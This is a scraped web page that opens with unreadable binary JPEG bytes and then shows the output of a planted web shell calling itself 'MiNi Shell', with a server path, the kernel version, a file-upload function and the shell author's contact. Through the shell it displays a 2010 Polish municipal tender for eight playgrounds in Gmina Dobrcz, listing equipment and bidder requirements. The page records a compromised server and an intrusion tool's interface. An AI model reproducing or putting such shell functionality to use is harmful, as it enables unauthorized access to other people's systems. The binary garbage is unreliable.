JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100729/229806-N-2010.html

<p class="kh_header"><b>Dobrcz: BUDOWA PLACÓW ZABAW W GMINIE DOBRCZ</b><br>
<b>Numer ogłoszenia: 229806 - 2010; data zamieszczenia: 29.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrcz , ul. Długa 50, 86-022 Dobrcz, woj. kujawsko-pomorskie, tel. 052 3648010, faks 052 3648032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA PLACÓW ZABAW W GMINIE DOBRCZ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup, dostawa i urządzenie ośmiu placów zabaw                         w sołectwach na terenie Gminy Dobrcz. Place usytuowane są w miejscowościach: Borówno na terenie działki 56/1, Dobrcz na terenie działki 25, Kotomierz na terenie działki 245/5, Kusowo na terenie działki 97/130, Strzelce Górne na terenie działki 122/2, Nekla na terenie działek 140, 142, Trzebień na terenie działki 12/2, Trzeciewiec na terenie działki 125/2.
Każdy z placów zabaw posiada własny wykaz elementów, jakie mają stanowić jego wyposażenie. Wykonawca zobowiązany będzie do:
- wykonania wszelkich prac związanych z przygotowaniem terenu pod place zabaw poprzez  usunięcie zbędnej roślinności i wyrównanie nawierzchni, 
- zamontowania elementów zabawowych na planowanych placach zabaw /pod elementy placów zabaw wymagające trwałego osadzenia w gruncie należy wykopać otwory                         i wbetonować stopy betonowe/,
- obsiania  powierzchni placu zabaw trawą,
- teren działki przeznaczony pod plac zabaw w miejscowościach /zgodnie z przedmiarami/ należy ogrodzić poprzez wstawienie słupków stalowych  o średnicy 40 mm ocynkowanych powleczonych PCV i zabetonowanie  na głębokość 40 cm z betonu B-15 oraz rozciągnięcie siatki drucianej plecionej oczka o wym 40x40 mm , ślimakowej wykonanej z drutu stalowego grub. 3,2 mm ocynkowanego powleczonego PCV,
- umieszczenia na każdym placu zabaw tablicy informacyjnej z regulaminem,  
- zapewnienia obsługi geodezyjnej zadania łącznie z wykonaniem inwentaryzacji geodezyjnej powykonawczej w 3 egz,

Do opisanego przedmiotu zamówienia załącza się przedmiar dla każdego z placów zabaw zawierający wykaz elementów zabawowych oraz zakres robót do wykonania -  załącznik f do SIWZ. /Dołączone przedmiary robót stanowią element pomocniczy do opracowania kosztorysu ofertowego/.

Zamówienie dotyczy realizacji projektu współfinansowanego ze środków Unii Europejskiej                 w ramach działania 4.1/413 Wdrażanie Lokalnych Strategii Rozwoju objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.

Zamawiający wymaga aby Wykonawca na każdym z ośmiu placów umieścił tablicę informacyjną  z informacją o dofinansowaniu operacji z PROW na lata 2007 - 2013 wraz             z logotypem Unii Europejskiej i PROW.  Treść tablic informacyjnych /UE/ należy uzgodnić                    z Zamawiającym.

Zagospodarowanie placu zabaw dla dzieci w Borównie.
Na plac zabaw przeznaczono teren o powierzchni ok. 344 m2. Plac zabaw będzie ogrodzony.
Nie przewiduje się nasadzenia drzew i krzewów. Teren placu zabaw należy obsiać trawą.
Projektowane wyposażenie placu zabaw:
- Tablica informacyjna z regulaminem 1szt.,
-  Ławka z oparciem 2szt.,
-  Sprężynowiec 1-osobowy 2szt.,
- Sprężynowiec 2-osobowy 1szt.,
-  Sprężynowiec 4-osobowy 1szt.,
- Tablica do rysowania 1szt.,
-Przejście rurowe 1szt.,
- Huśtawka wagowa 1szt.,
- Piaskownica sześciokątna z przykryciem 1szt.,
- Karuzela 1szt.,
- Domek z tablicą do rysowania 1szt.,
- Zestaw zabawowy 1szt. / zjeżdzalnia, wieża główna, pięć pomostów w tym dwa skośne, jeden wiszący,  przeplotnia, drabinka skośna /

Zagospodarowanie placu zabaw dla dzieci w Dobczu.
Na plac zabaw przeznaczono teren o powierzchni ok. 472 m2. Plac zabaw będzie ogrodzony ze wszystkich stron /z dwóch stron istniejące ogrodzenie, z pozostałych stron projektowane/.
Nie przewiduje się nasadzenia drzew i krzewów. Teren placu zabaw należy obsiać trawą.
Projektowane wyposażenie placu zabaw:
- Tablica informacyjna z regulaminem 1szt.,
- Kosz na śmieci 1szt.,
- Ławka z oparciem 3szt.,
- Piaskownica sześciokątna z przykryciem, stolikiem 1szt.,
- Sprężynowiec 4szt.,
- Tablica do rysowania 1szt.,
- Huśtawka wagowa 2szt.,
- Karuzela 1szt.,
- Przejście rurowe 1szt.,
- Drabinka 1szt.,
- Zestaw zabawowy 1szt. /dwie zjeżdżalnie, trzy wieże, dwie drabinki w tym skośna, pięć pomostów w tym z belką i wiszący, belka z uchwytami, ścianka wspinaczkowa /

Zagospodarowanie placu zabaw dla dzieci w Kotomierzu.
Na plac zabaw przeznaczono teren o powierzchni ok. 510 m2. Plac zabaw będzie ogrodzony z
trzech stron /z jednej strony istniejące ogrodzenie, z dwóch stron projektowane/.
Nie przewiduje się nasadzenia drzew i krzewów. Teren placu zabaw należy obsiać trawą.
Projektowane wyposażenie placu zabaw:
- Tablica informacyjna z regulaminem 1szt.,
- Ławka z oparciem 1szt.,
- Sprężynowiec 2szt.,
- Tablica do rysowania 1szt.,
- Piaskownica kwadratowa z przykryciem 1szt.,
- Huśtawka wagowa 1szt.,
- Karuzela tarczowa 1szt.,
- Zestaw zabawowy 1szt. / zjeżdżalnia, wieża główna, pięć pomostów w tym dwa skośne i jeden wiszący, przeplotnia, drabinka/

Zagospodarowanie placu zabaw dla dzieci w Kusowie.
Na plac zabaw przeznaczono teren o powierzchni ok. 620 m2. Plac zabaw będzie ogrodzony. Dwie
furtki na ww teren znajdować się będą w projektowanym ogrodzeniu. Nie przewiduje się nasadzenia
drzew i krzewów.
Projektowane wyposażenie placu zabaw:
-Tablica informacyjna z regulaminem 1szt.,
-Ławka z oparciem 1szt.,
- Huśtawka wagowa 1szt.,
- Piaskownica z przykryciem 1szt.,
- Sprężynowiec 1-osobowy 1szt.,
- Sprężynowiec 2-osobowy 1szt.,
- Sprężynowiec 4-osobowy 1szt.,
- Karuzela tarczowa 1szt.,
- Drabinka 1szt.,
- Zestaw zabawowy 1szt. / zjeżdżalnia, wieża główna, pięć pomostów w tym dwa skośne                 i jeden wiszący, przeplotnia, drabinka/

Zagospodarowania placu zabaw dla dzieci w Strzelcach Górnych.
Na plac zabaw przeznaczono teren o powierzchni ok. 773 m2. Plac zabaw będzie ogrodzony
/istniejące ogrodzenie oraz projektowane ogrodzenie/.
Nie przewiduje się nasadzenia drzew i krzewów. Teren placu zabaw należy obsiać trawą.
Projektowane wyposażenie placu zabaw:
-Tablica informacyjna z regulaminem 1szt.,
- Ławka z oparciem 4szt.,
- Tablica do rysowania 2szt.,
- Sprężynowiec 1-osobowy 3szt.,
- Sprężynowiec 2-osobowy 2szt.,
- Sprężynowiec 4-osobowy 1szt.,
- Huśtawka wagowa 1szt.,
- Karuzela tarczowa 1szt.,
- Piaskownica z przykryciem 1szt.,
- Zestaw zabawowy 1szt. /zjeżdżalnia, wieża główna, pięć pomostów w tym dwa skośne i jeden wiszący, przeplotnia, drabinka/

Zagospodarowania placu zabaw dla dzieci w Nekli.
Na plac zabaw przeznaczono teren o powierzchni 1344,85 m2. Plac zabaw należy ogrodzić ze
wszystkich stron.
Nie przewiduje się nasadzenia drzew i krzewów oraz obsiania terenu trawą, ponieważ na obszarze
planowanego placu zabaw znajduje się trawnik.
Projektowane wyposażenie placu zabaw:
- Tablica informacyjna z regulaminem 1szt.,
-Sprężynowiec 1szt.,
-Obręcz do koszykówki 2szt.

Zagospodarowania placu zabaw dla dzieci w Trzebieniu.
Na plac zabaw przeznaczono teren o powierzchni ok. 387,01 m2. Plac zabaw będzie ogrodzony ze
wszystkich stron /z dwóch stron istniejące ogrodzenie należy zdemontować i wykonać nowe/.
Nie przewiduje się nasadzenia drzew i krzewów oraz obsiania terenu trawą, ponieważ na obszarze
planowanego placu zabaw znajduje się trawnik.
Projektowane wyposażenie placu zabaw:
- Tablica informacyjna z regulaminem 1szt.,
- Karuzela tarczowa 1szt.,
- Zestaw zabawowy 1szt. / zjeżdżalnia, wieża główna, pięć pomostów w tym dwa skośne i jeden wiszący, przeplotnia, drabinka/

Zagospodarowania placu zabaw dla dzieci w Trzeciewcu
Na plac zabaw przeznaczono teren o powierzchni 393,12 m2. Projektuje się ogrodzenie placu
zabaw ze wszystkich stron.
Nie przewiduje się nasadzenia drzew i krzewów oraz obsiania terenu trawą, ponieważ na obszarze
planowanego placu zabaw znajduje się trawnik.
Projektowane wyposażenie placu zabaw:
- Tablica informacyjna z regulaminem 1szt.,
- Piaskownica sześciokątna z przykryciem1szt.,                                                                                        -Sprężynowiec 1szt.,
- Huśtawka wagowa 1szt.,
- Przejście rurowe 1szt.,
- Karuzela 1szt.,
- Drabinka 1szt.,
- Zestaw zabawowy 1szt. / zjeżdżalnia, wieża główna, pięć pomostów w tym dwa skośne i jeden wiszący, przeplotnia, drabinka/

Uwaga!!!
Wymagania odnośnie przedmiotu zamówienia

1/ Materiały użyte przez Wykonawcę do wykonania przedmiotu zamówienia będą posiadać odpowiednie atesty, i będą zgodne z przewidzianymi prawem normami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium w wysokości 4.000,- zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania , że wykonawca spełnia warunek uprawnień do wykonywania określonej działalności, zamawiający wymaga złożenia aktualnego odpisu z właściwego rejestru lub wpisu do ewidencji działalności gospodarczej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania , że wykonawca spełnia warunek wiedzy i doświadczenia, zamawiający wymaga by wykazał, iż wykonał w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeśli okres prowadzenia jest krótszy - w tym okresie, dostaw lub usług z podaniem ich  wartości, przedmiotu dat wykonania i odbiorców</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym zamawiający wymaga , by wykonawca wykazał iż dysponuje sprzętem w ilości pozwalającej na sprawne zrealizowanie zamówienia i dotrzymanie terminu jego zrealizowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający wymaga, by wykonawca złożył wykaz osób, które będą uczestniczyć              w wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek sytuacji ekonomicznej i finansowej, zamawiający wymaga, by wykonawca wykazał posiadanie opłaconej polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej           w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeśli wykonawca, wykazując spełnienie warunków o których mowa w art.22 ust.1 ustawy Prawo Zamówień Publicznych, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b, a podmioty te będą brały udział w realizacji zamówienia, zamawiający żąda od wykonawców przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w § 6 pkt.II niniejszej SIWZ.
2. Dla wykonawców działających w oparciu o wpis do ewidencji działalności gospodarczej - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Kopie certyfikatów bezpieczeństwa dla urządzeń i elementów placów zabaw, które maja być dostarczone.
4.Kopia dowodu wpłaty wadium
5.Kosztorys ofertowy.
6.Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeśli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego  w § 6 pkt. II ppkt.2 i pkt. IV.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza do zmiany postanowień umowy w przypadkach określonych w załączonym do SIWZ projekcie umowy oraz w przypadku:                                                                                                     a. wystąpienia oczywistych omyłek pisarskich i rachunkowych,                                                                                            b. zmiany osób odpowiedzialnych za realizację przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dobrcz.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dobrcz, ul. Długa 50, 86-022 Dobrcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2010 godzina 09:00, miejsce: Urząd Gminy Dobrcz, ul. Długa 50, 86-022 Dobrcz, I piętro, pokój nr 14 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy realizacji projektu współfinansowanego ze środków Unii Europejskiej                 w ramach działania 4.1/413 Wdrażanie Lokalnych Strategii Rozwoju objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com